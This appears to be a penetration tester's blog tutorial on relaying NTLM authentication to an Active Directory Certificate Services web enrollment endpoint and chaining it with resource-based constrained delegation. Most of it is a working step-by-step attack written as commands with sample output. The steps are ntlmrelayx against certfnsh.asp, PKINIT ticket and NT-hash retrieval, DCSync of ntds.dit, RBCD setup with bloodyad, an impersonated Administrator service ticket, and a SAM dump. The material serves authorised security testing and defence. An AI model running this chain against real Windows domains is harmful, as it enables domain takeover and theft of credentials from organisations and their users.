Relaying to Active Directory Certificate Services (ADCS) and Resource Based Constrained Delegation (RBCD)
Getting Local Administrator access with NTLM Relay attacks against ADCS and RBCD attacks.
When conducting internal penetration tests, It seems that more often than not these days clients have implemented LDAP channel binding, LDAP signing and SMB singing across all or the majority of their Windows estate. This is great news, but it means that most of the powerfull NTLM relaying attacks are a non starter. However, in all cases so far the client was also using Active Directory Certificate Services (ADCS), and had web enrollment enabled.
When you cant relay to LDAP, relaying to the ADCS HTTP endpoint is the next best thing. Unlike LDAP and SMB when relaying to HTTP, NTLM authentication requests on any protocol from any source can be used. (llmnr, nbname and dhcpv6 spoofing, various RPC call backs, MSSQL...), relaying of a DC account equals DCSync, and relaying any machine account equals local admin when combined with Resource Based Constrained Delegation (RBCD).
Relay
Fire up ntlmrelayx and await connections.
dntlmrelayx -t http://adcs.local/certsrv/certfnsh.asp -smb2support --adcs
Get TGT
upon successfull relay use the returned base64 encoded certficate pfx file to request TGT for the relayed account.
python3 /opt/PKINITtools/gettgtpkinit.py 'domain/relayed$' -pfx-base64 $(cat relayed.pfx.b64) relayed.ccache
save the AS-REP encryption key for later
use the TGT to grab the NT hash for the relayed account (you dont need to do this, you can authenticate directly with the TGT but having the hash gives you additional options if you need it)
Get NTHASH
export KRB5CCNAME=relayed.ccache python3 /opt/PKINITtools/getnthash.py -key as-rep_key domain/relayed$
DCSync
If you are lucky enough to relay an existing domain controller account then you can can now just use the hash or TGT to perform a dcsync and grab the contents of the ntds.dit
export KRB5CCNAME=relayed.ccache python3 secretsdump.py -k -no-pass relayed.local
or
python3 secretsdump.py 'domain/relayed_dc$@relayed_dc.local' -hashes hash:hash
RBCD
if the relayed account is a workstation or member server use bloodyad to configure resource based constrained delegation.
The below command will configure RDCD to allow the relayed machine account to impersonate users on itself. You can configure delegation for any other account you have control over, user or machine. Alternatively, you can create a new machine account (if the quota allows) and delegate access to that.
$ dbloodyad -d 'domain' -u 'relayed$' -p 'hash:hash' --host domain_controller.local setRbcd 'relayed$' 'relayed$'
if all goes well the output will look something like this
[!] No security descriptor has been returned, a new one will be created [*] relayed$ SID is: S-1-5-21-4137651732-2841336529-2432679705-3333 [+] msDS-AllowedToActOnBehalfOfOtherIdentity set successfully [+] relayed$ can now impersonate users on relayed$ via S4U2Proxy
Silver Ticket
then request a silver ticket impersonating an administrator
python3 getST.py -spn DNS/relayed -impersonate 'Administrator' -dc-ip dc_ip 'domain/relayed$' -hashes 'hash:hash'
desired output
[*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator.ccache
secrets dump
use the ticket to impersonate an administrator on the relayed host and dump SAM.
export KRB5CCNAME=Administrator.ccache python3 secretsdump.py -k relayed.local